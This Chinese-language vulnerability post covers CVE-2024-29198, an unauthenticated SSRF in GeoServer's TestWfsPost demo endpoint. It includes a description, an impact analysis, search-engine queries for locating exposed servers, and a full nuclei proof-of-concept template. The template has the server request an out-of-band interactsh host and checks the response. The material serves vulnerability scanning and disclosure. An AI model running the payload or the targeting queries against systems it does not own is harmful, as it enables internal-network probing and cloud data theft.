geoserver SSRF via Demo TestWfsPost Request Endpoint Vulnerability

漏洞信息

漏洞名称: geoserver SSRF via Demo TestWfsPost Request Endpoint Vulnerability

漏洞编号:

  • CVE: CVE-2024-29198

漏洞类型: 服务端请求伪造

漏洞等级: 高危

漏洞描述: 该漏洞影响的产品是GeoServer,一个开源的服务器软件,用于共享和编辑地理空间数据。它广泛应用于各种地理信息系统(GIS)应用中,支持多种数据格式和标准。由于其强大的功能和灵活性,GeoServer被许多企业和组织用于处理和发布地理空间数据。

漏洞解释方面,这是一个服务端请求伪造(SSRF)漏洞,存在于GeoServer的Demo TestWfsPost请求端点中。当Proxy Base URL未设置时,未认证的用户可以构造一个请求,服务器会执行该请求。这允许攻击者枚举内部网络,或在云实例的情况下访问敏感数据。漏洞的技术根源在于服务器未能正确验证和限制用户提供的URL,导致可以发起任意的HTTP请求。

影响分析显示,此漏洞的严重性为高危,因为它允许攻击者从服务器发起请求,可能导致内部网络信息泄露或敏感数据访问。由于漏洞不需要认证即可利用,且可以自动化攻击,因此风险较高。攻击者可以利用此漏洞进行内部网络探测,进一步利用其他漏洞或直接访问敏感信息,对受影响系统构成严重威胁。

产品厂商: osgeo

产品名称: geoserver

搜索语法: http.title:”geoserver”, server:”geohttpserver”, app=”geoserver”, title=”geoserver”, intitle:”geoserver”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/245bf9b3c259b2032d9577ec503d580f46413687/http%2Fcves%2F2024%2FCVE-2024-29198.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

id: CVE-2024-29198

info:
name: SSRF via Demo TestWfsPost Request Endpoint (Proxy Base URL Not Set)
author: iamnoooob,pdresearch
severity: high
description: |
It is possible to achieve Server Side Request Forgery (SSRF) via the Demo request endpoint if Proxy Base URL has not been set. An unauthenticated user can supply a request that will be issued by the server, allowing enumeration of internal networks and, in the case of cloud instances, access to sensitive data.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-29198
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5gw5-jccf-6hxw
- https://osgeo-org.atlassian.net/browse/GEOS-11390
- https://osgeo-org.atlassian.net/browse/GEOS-11794
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-29198
cwe-id: CWE-918
epss-score: 0.00039
epss-percentile: 0.11129
metadata:
verified: true
max-request: 1
vendor: osgeo
product: geoserver
shodan-query:
- http.title:"geoserver"
- server:"geohttpserver"
fofa-query:
- app="geoserver"
- title="geoserver"
google-query: intitle:"geoserver"
tags: cve,cve2024,ssrf,geoserver,oos,unauth,oast

variables:
string: "{{randstr}}"

http:
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

url=http://{{interactsh-url}}/?body={{string}}

matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains(body, '{{string}}')
- contains(content_type, 'text/plain')
- status_code == 200
condition: and



geoserver SSRF via Demo TestWfsPost Request Endpoint Vulnerability
http://example.com/2025/07/14/github_3507646180/
作者
lianccc
发布于
2025年7月14日
许可协议